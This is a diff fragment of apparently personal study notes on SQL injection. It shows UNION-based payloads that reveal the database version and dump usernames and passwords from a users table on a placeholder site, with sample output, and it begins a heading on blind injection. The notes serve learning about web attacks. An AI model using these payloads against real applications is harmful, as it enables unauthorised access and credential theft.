fathimakm/web_security_notes/sql_injection.md

     this checks if data type of 1st column is text , and 2nd column is also text.

+- to find version of database,
+' UNION SELECT @@version, NULL# (null is added because there are 2 columns)

-    `www.test.com/app.php?id=' UNION SELECT username, password FROM users--` we did'nt give id so it's empty
+    `www.test.com/app.php?id=' UNION SELECT username, password FROM users--` we didn't give id so it's empty
     `output:ac1, passw1, adm1, pass2`

 2. Interential(Blind)